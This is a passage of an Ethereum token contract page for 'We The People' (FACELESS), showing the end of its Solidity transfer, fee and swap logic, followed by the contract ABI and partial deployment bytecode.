                    require(_isExcludedFromFees[from] || _isExcludedFromFees[to], "Trading is not active.");
                }
 
                // at launch if the transfer delay is enabled, ensure the block timestamps for purchasers is set -- during launch.  
                if (transferDelayEnabled){
                    if (to != owner() && to != address(uniswapV2Router) && to != address(uniswapV2Pair)){
                        require(_holderLastTransferTimestamp[tx.origin] <= block.number, "_transfer:: Transfer Delay enabled.  Only one purchase per block allowed.");
                        _holderLastTransferTimestamp[tx.origin] = block.number;
                    }
                }
 
                //when buy
                if (automatedMarketMakerPairs[from] && !_isExcludedMaxTransactionAmount[to]) {
                        require(amount <= maxTransactionAmount, "Buy transfer amount exceeds the maxTransactionAmount.");
                        require(amount + balanceOf(to) <= maxWallet, "Max wallet exceeded");
                }
 
                //when sell
                else if (automatedMarketMakerPairs[to] && !_isExcludedMaxTransactionAmount[from]) {
                        require(amount <= maxTransactionAmount, "Sell transfer amount exceeds the maxTransactionAmount.");
                }
                else if(!_isExcludedMaxTransactionAmount[to]){
                    require(amount + balanceOf(to) <= maxWallet, "Max wallet exceeded");
                }
            }
        }
 
       
        uint256 contractTokenBalance = balanceOf(address(this));
 
        bool canSwap = contractTokenBalance >= swapTokensAtAmount;
 
        if( 
            canSwap &&
            swapEnabled &&
            !swapping &&
            !automatedMarketMakerPairs[from] &&
            !_isExcludedFromFees[from] &&
            !_isExcludedFromFees[to]
        ) {
            swapping = true;
 
            swapBack();
 
            swapping = false;
        }
 
         bool takeFee = !swapping;
 
        // if any account belongs to _isExcludedFromFee account then remove the fee
        if(_isExcludedFromFees[from] || _isExcludedFromFees[to]) {
            takeFee = false;
        }
 
        uint256 fees = 0;
        // only take fees on buys/sells, do not take on wallet transfers
        if(takeFee){
            // on sell
            if (automatedMarketMakerPairs[to] && sellTotalFees > 0){
                fees = amount.mul(sellTotalFees).div(100);
                tokensForLiquidity += fees * sellLiquidityFee / sellTotalFees;
                tokensForDev += fees * sellDevFee / sellTotalFees;
                tokensForMarketing += fees * sellMarketing / sellTotalFees;
            }
            // on buy
            else if(automatedMarketMakerPairs[from] && buyTotalFees > 0) {
                fees = amount.mul(buyTotalFees).div(100);
                tokensForLiquidity += fees * buyLiquidityFee / buyTotalFees;
                tokensForDev += fees * buyDevFee / buyTotalFees;
                tokensForMarketing += fees * buyMarketing / buyTotalFees;
            }
 
            if(fees > 0){    
                super._transfer(from, address(this), fees);
            }
 
            amount -= fees;
        }
 
        super._transfer(from, to, amount);
    }
 
    function swapTokensForEth(uint256 tokenAmount) private {
 
        // generate the uniswap pair path of token -> weth
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();
 
        _approve(address(this), address(uniswapV2Router), tokenAmount);
 
        // make the swap
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0, // accept any amount of ETH
            path,
            address(this),
            block.timestamp
        );
 
    }
 
    function addLiquidity(uint256 tokenAmount, uint256 ethAmount) private {
        // approve token transfer to cover all possible scenarios
        _approve(address(this), address(uniswapV2Router), tokenAmount);
 
        // add the liquidity
        uniswapV2Router.addLiquidityETH{value: ethAmount}(
            address(this),
            tokenAmount,
            0, // slippage is unavoidable
            0, // slippage is unavoidable
            address(this),
            block.timestamp
        );
    }
 
    function swapBack() private {
        uint256 contractBalance = balanceOf(address(this));
        uint256 totalTokensToSwap = tokensForLiquidity + tokensForMarketing + tokensForDev;
        bool success;
 
        if(contractBalance == 0 || totalTokensToSwap == 0) {return;}
 
        if(contractBalance > swapTokensAtAmount * 20){
          contractBalance = swapTokensAtAmount * 20;
        }
 
        // Halve the amount of liquidity tokens
        uint256 liquidityTokens = contractBalance * tokensForLiquidity / totalTokensToSwap / 2;
        uint256 amountToSwapForETH = contractBalance.sub(liquidityTokens);
 
        uint256 initialETHBalance = address(this).balance;
 
        swapTokensForEth(amountToSwapForETH); 
 
        uint256 ethBalance = address(this).balance.sub(initialETHBalance);
 
        uint256 ethForMarketing = ethBalance.mul(tokensForMarketing).div(totalTokensToSwap);
        uint256 ethForDev = ethBalance.mul(tokensForDev).div(totalTokensToSwap);
        uint256 ethForLiquidity = ethBalance - ethForMarketing - ethForDev;
 
 
        tokensForLiquidity = 0;
        tokensForMarketing = 0;
        tokensForDev = 0;
 
        (success,) = address(DevWallet).call{value: ethForDev}("");
 
        if(liquidityTokens > 0 && ethForLiquidity > 0){
            addLiquidity(liquidityTokens, ethForLiquidity);
            emit SwapAndLiquify(amountToSwapForETH, ethForLiquidity, tokensForLiquidity);
        }
 
        (success,) = address(MarketingWallet).call{value: address(this).balance}("");
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[],"name":"AutoNukeLP","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sniper","type":"address"}],"name":"BoughtEarly","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"DevWalletUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[],"name":"ManualNukeLP","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"MarketingWalletUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newAddress","type":"address"},{"indexed":true,"internalType":"address","name":"oldAddress","type":"address"}],"name":"UpdateUniswapV2Router","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_isExcludedMaxTransactionAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"automatedMarketMakerPairs","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyMarketing","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"disableTransferDelay","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"excludeFromMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"Add","type":"uint256"},{"internalType":"uint256","name":"Remove","type":"uint256"}],"name":"isSniper","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"limitsInEffect","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellMarketing","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"},{"internalType":"bool","name":"value","type":"bool"}],"name":"setAutomatedMarketMakerPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForDev","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForLiquidity","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForMarketing","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"transferDelayEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_Marketing","type":"uint256"},{"internalType":"uint256","name":"_liquidityFee","type":"uint256"},{"internalType":"uint256","name":"_DevFee","type":"uint256"}],"name":"updateBuyFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newWallet","type":"address"}],"name":"updateDevWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newMarketingWallet","type":"address"}],"name":"updateMarketingWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxTxnAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxWalletAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_Marketing","type":"uint256"},{"internalType":"uint256","name":"_liquidityFee","type":"uint256"},{"internalType":"uint256","name":"_DevFee","type":"uint256"}],"name":"updateSellFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"enabled","type":"bool"}],"name":"updateSwapEnabled","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newAmount","type":"uint256"}],"name":"updateSwapTokensAtAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60c06040526001600b60006101000a81548160ff0219169083151502179055506000600b60016101000a81548160ff0219169083151502179055506000600b60026101000a81548160ff0219169083151502179055506001600f60006101000a81548160ff0219169083151502179055503480156200007d57600080fd5b506040518060400160405280600d81526020017f5765205468652050656f706c65000000000000000000000000000000000000008152506040518060400160405280600881526020017f464143454c45535300000000000000000000000000000000000000000000000081525081600390805190602001906200010292919062000bd0565b5080600490805190602001906200011b92919062000bd0565b5050506000620001306200069460201b60201c565b905080600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3506000737a250d5630b4cf539739df2c5dacb4c659f2488d9050620001fb8160016200069c60201b60201c565b8073ffffffffffffffffffffffffffffffffffffffff1660808173ffffffffffffffffffffffffffffffffffffffff16815250508073ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200027b573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002a1919062000cea565b73ffffffffffffffffffffffffffffffffffffffff1663c9c65396308373ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000309573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200032f919062000cea565b6040518363ffffffff1660e01b81526004016200034e92919062000d2d565b6020604051808303816000875af11580156200036e573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000394919062000cea565b73ffffffffffffffffffffffffffffffffffffffff1660a08173ffffffffffffffffffffffffffffffffffffffff1681525050620003dc60a05160016200069c60201b60201c565b620003f160a05160016200079960201b60201c565b60008060019050600080600060019050600080620004146200083a60201b60201c565b600a62000422919062000ef4565b620f424062000432919062000f45565b9050620004446200083a60201b60201c565b600a62000452919062000ef4565b614e2062000461919062000f45565b600881905550620004776200083a60201b60201c565b600a62000485919062000ef4565b61753062000494919062000f45565b600a81905550612710600a82620004ac919062000f45565b620004b8919062000fd5565b600981905550866011819055508560128190555084601381905550601354601254601154620004e891906200100d565b620004f491906200100d565b6010819055508360158190555082601681905550816017819055506017546016546015546200052491906200100d565b6200053091906200100d565b60148190555073c76470706f9544995148884f673fe34a184e4adc600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555073c76470706f9544995148884f673fe34a184e4adc600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555062000602620005f46200084360201b60201c565b60016200086d60201b60201c565b620006153060016200086d60201b60201c565b6200062a61dead60016200086d60201b60201c565b6200064c6200063e6200084360201b60201c565b60016200069c60201b60201c565b6200065f3060016200069c60201b60201c565b6200067461dead60016200069c60201b60201c565b620006863382620009ba60201b60201c565b50505050505050506200129d565b600033905090565b620006ac6200069460201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146200073e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200073590620010cb565b60405180910390fd5b80601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b80601e60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b60006012905090565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6200087d6200069460201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146200090f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200090690620010cb565b60405180910390fd5b80601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df782604051620009ae91906200110a565b60405180910390a25050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000a2c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000a239062001177565b60405180910390fd5b62000a406000838362000b6860201b60201c565b62000a5c8160025462000b6d60201b6200265b1790919060201c565b60028190555062000aba816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205462000b6d60201b6200265b1790919060201c565b6000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000b5c9190620011aa565b60405180910390a35050565b505050565b600080828462000b7e91906200100d565b90508381101562000bc6576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000bbd9062001217565b60405180910390fd5b8091505092915050565b82805462000bde9062001268565b90600052602060002090601f01602090048101928262000c02576000855562000c4e565b82601f1062000c1d57805160ff191683800117855562000c4e565b8280016001018555821562000c4e579182015b8281111562000c4d57825182559160200191906001019062000c30565b5b50905062000c5d919062000c61565b5090565b5b8082111562000c7c57600081600090555060010162000c62565b5090565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000cb28262000c85565b9050919050565b62000cc48162000ca5565b811462000cd057600080fd5b50565b60008151905062000ce48162000cb9565b92915050565b60006020828403121562000d035762000d0262000c80565b5b600062000d138482850162000cd3565b91505092915050565b62000d278162000ca5565b82525050565b600060408201905062000d44600083018562000d1c565b62000d53602083018462000d1c565b9392505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000de85780860481111562000dc05762000dbf62000d5a565b5b600185161562000dd05780820291505b808102905062000de08562000d89565b945062000da0565b94509492505050565b60008262000e03576001905062000ed6565b8162000e13576000905062000ed6565b816001811462000e2c576002811462000e375762000e6d565b600191505062000ed6565b60ff84111562000e4c5762000e4b62000d5a565b5b8360020a91508482111562000e665762000e6562000d5a565b5b5062000ed6565b5060208310610133831016604e8410600b841016171562000ea75782820a90508381111562000ea15762000ea062000d5a565b5b62000ed6565b62000eb6848484600162000d96565b9250905081840481111562000ed05762000ecf62000d5a565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b600062000f018262000edd565b915062000f0e8362000ee7565b925062000f3d7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000df1565b905092915050565b600062000f528262000edd565b915062000f5f8362000edd565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161562000f9b5762000f9a62000d5a565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600062000fe28262000edd565b915062000fef8362000edd565b92508262001002576200100162000fa6565b5b828204905092915050565b60006200101a8262000edd565b9150620010278362000edd565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156200105f576200105e62000d5a565b5b828201905092915050565b600082825260208201905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000620010b36020836200106a565b9150620010c0826200107b565b602082019050919050565b60006020820190508181036000830152620010e681620010a4565b9050919050565b60008115159050919050565b6200110481620010ed565b82525050565b6000602082019050620011216000830184620010f9565b92915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b60006200115f601f836200106a565b91506200116c8262001127565b602082019050919050565b60006020820190508181036000830152620011928162001150565b9050919050565b620011a48162000edd565b82525050565b6000602082019050620011c1600083018462001199565b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000620011ff601b836200106a565b91506200120c82620011c7565b602082019050919050565b600060208201905081810360008301526200123281620011f0565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200128157607f821691505b60208210810362001297576200129662001239565b5b50919050565b60805160a0516159346200131060003960008181611187015281816119770152818161221001528181612d220152818161370f0152613755015260008181610d3701528181612cca01528181613875015281816139560152818161397d015281816140a601526140cd01526159346000f3fe6080604052600436106103035760003560e01c806395d89b4111610190578063c18bc195116100dc578063dd62ed3e11610095578063f11a24d31161006f578063f11a24d314610bbb578063f2fde38b14610be6578063f637434214610c0f578063f8b45b0514610c3a5761030a565b8063dd62ed3e14610b28578063e2f4560514610b65578063e884f26014610b905761030a565b8063c18bc19514610a04578063c876d0b914610a2d578063c8c8ebe414610a58578063d257b34f14610a83578063d85ba06314610ac0578063dbc09ab814610aeb5761030a565b8063a8b9f94d11610149578063b62496f511610123578063b62496f51461094a578063bbc0c74214610987578063c0246668146109b2578063c17b5b8c146109db5761030a565b8063a8b9f94d146108b9578063a9059cbb146108e4578063aacebbe3146109215761030a565b806395d89b41146107a75780639a7a23d6146107d25780639c3b4fdc146107fb5780639fccce3214610826578063a0d82dc514610851578063a457c2d71461087c5761030a565b80634a62bb651161024f578063715018a6116102085780638095d564116101e25780638095d564146107135780638a8c523c1461073c5780638da5cb5b14610753578063924de9b71461077e5761030a565b8063715018a6146106a8578063751039fc146106bf5780637571336a146106ea5761030a565b80634a62bb65146105825780634fbee193146105ad5780636a486a8e146105ea5780636b41ae0c146106155780636ddd17131461064057806370a082311461066b5761030a565b80631a8145bb116102bc57806323b872dd1161029657806323b872dd146104b2578063313ce567146104ef578063395093511461051a57806349bd5a5e146105575761030a565b80631a8145bb146104335780631f3fed8f1461045e578063203e727e146104895761030a565b806306fdde031461030f578063095ea7b31461033a57806310d5de53146103775780631694505e146103b457806318160ddd146103df5780631816467f1461040a5761030a565b3661030a57005b600080fd5b34801561031b57600080fd5b50610324610c65565b6040516103319190614276565b60405180910390f35b34801561034657600080fd5b50610361600480360381019061035c9190614331565b610cf7565b60405161036e919061438c565b60405180910390f35b34801561038357600080fd5b5061039e600480360381019061039991906143a7565b610d15565b6040516103ab919061438c565b60405180910390f35b3480156103c057600080fd5b506103c9610d35565b6040516103d69190614433565b60405180910390f35b3480156103eb57600080fd5b506103f4610d59565b604051610401919061445d565b60405180910390f35b34801561041657600080fd5b50610431600480360381019061042c91906143a7565b610d63565b005b34801561043f57600080fd5b50610448610eba565b604051610455919061445d565b60405180910390f35b34801561046a57600080fd5b50610473610ec0565b604051610480919061445d565b60405180910390f35b34801561049557600080fd5b506104b060048036038101906104ab9190614478565b610ec6565b005b3480156104be57600080fd5b506104d960048036038101906104d491906144a5565b610ff0565b6040516104e6919061438c565b60405180910390f35b3480156104fb57600080fd5b506105046110c9565b6040516105119190614514565b60405180910390f35b34801561052657600080fd5b50610541600480360381019061053c9190614331565b6110d2565b60405161054e919061438c565b60405180910390f35b34801561056357600080fd5b5061056c611185565b604051610579919061453e565b60405180910390f35b34801561058e57600080fd5b506105976111a9565b6040516105a4919061438c565b60405180910390f35b3480156105b957600080fd5b506105d460048036038101906105cf91906143a7565b6111bc565b6040516105e1919061438c565b60405180910390f35b3480156105f657600080fd5b506105ff611212565b60405161060c919061445d565b60405180910390f35b34801561062157600080fd5b5061062a611218565b604051610637919061445d565b60405180910390f35b34801561064c57600080fd5b5061065561121e565b604051610662919061438c565b60405180910390f35b34801561067757600080fd5b50610692600480360381019061068d91906143a7565b611231565b60405161069f919061445d565b60405180910390f35b3480156106b457600080fd5b506106bd611279565b005b3480156106cb57600080fd5b506106d46113d1565b6040516106e1919061438c565b60405180910390f35b3480156106f657600080fd5b50610711600480360381019061070c9190614585565b61148c565b005b34801561071f57600080fd5b5061073a600480360381019061073591906145c5565b61157e565b005b34801561074857600080fd5b50610751611698565b005b34801561075f57600080fd5b5061076861176e565b604051610775919061453e565b60405180910390f35b34801561078a57600080fd5b506107a560048036038101906107a09190614618565b611798565b005b3480156107b357600080fd5b506107bc61184c565b6040516107c99190614276565b60405180910390f35b3480156107de57600080fd5b506107f960048036038101906107f49190614585565b6118de565b005b34801561080757600080fd5b50610810611a11565b60405161081d919061445d565b60405180910390f35b34801561083257600080fd5b5061083b611a17565b604051610848919061445d565b60405180910390f35b34801561085d57600080fd5b50610866611a1d565b604051610873919061445d565b60405180910390f35b34801561088857600080fd5b506108a3600480360381019061089e9190614331565b611a23565b6040516108b0919061438c565b60405180910390f35b3480156108c557600080fd5b506108ce611af0565b6040516108db919061445d565b60405180910390f35b3480156108f057600080fd5b5061090b60048036038101906109069190614331565b611af6565b604051610918919061438c565b60405180910390f35b34801561092d57600080fd5b50610948600480360381019061094391906143a7565b611b14565b005b34801561095657600080fd5b50610971600480360381019061096c91906143a7565b611c6b565b60405161097e919061438c565b60405180910390f35b34801561099357600080fd5b5061099c611c8b565b6040516109a9919061438c565b60405180910390f35b3480156109be57600080fd5b506109d960048036038101906109d49190614585565b611c9e565b005b3480156109e757600080fd5b50610a0260048036038101906109fd91906145c5565b611dde565b005b348015610a1057600080fd5b50610a2b6004803603810190610a269190614478565b611ef8565b005b348015610a3957600080fd5b50610a42612022565b604051610a4f919061438c565b60405180910390f35b348015610a6457600080fd5b50610a6d612035565b604051610a7a919061445d565b60405180910390f35b348015610a8f57600080fd5b50610aaa6004803603810190610aa59190614478565b61203b565b604051610ab7919061438c565b60405180910390f35b348015610acc57600080fd5b50610ad56121ab565b604051610ae2919061445d565b60405180910390f35b348015610af757600080fd5b50610b126004803603810190610b0d9190614645565b6121b1565b604051610b1f919061438c565b60405180910390f35b348015610b3457600080fd5b50610b4f6004803603810190610b4a9190614685565b61233b565b604051610b5c919061445d565b60405180910390f35b348015610b7157600080fd5b50610b7a6123c2565b604051610b87919061445d565b60405180910390f35b348015610b9c57600080fd5b50610ba56123c8565b604051610bb2919061438c565b60405180910390f35b348015610bc757600080fd5b50610bd0612483565b604051610bdd919061445d565b60405180910390f35b348015610bf257600080fd5b50610c0d6004803603810190610c0891906143a7565b612489565b005b348015610c1b57600080fd5b50610c2461264f565b604051610c31919061445d565b60405180910390f35b348015610c4657600080fd5b50610c4f612655565b604051610c5c919061445d565b60405180910390f35b606060038054610c74906146f4565b80601f0160208091040260200160405190810160405280929190818152602001828054610ca0906146f4565b8015610ced5780601f10610cc257610100808354040283529160200191610ced565b820191906000526020600020905b815481529060010190602001808311610cd057829003601f168201915b5050505050905090565b6000610d0b610d046126b9565b84846126c1565b6001905092915050565b60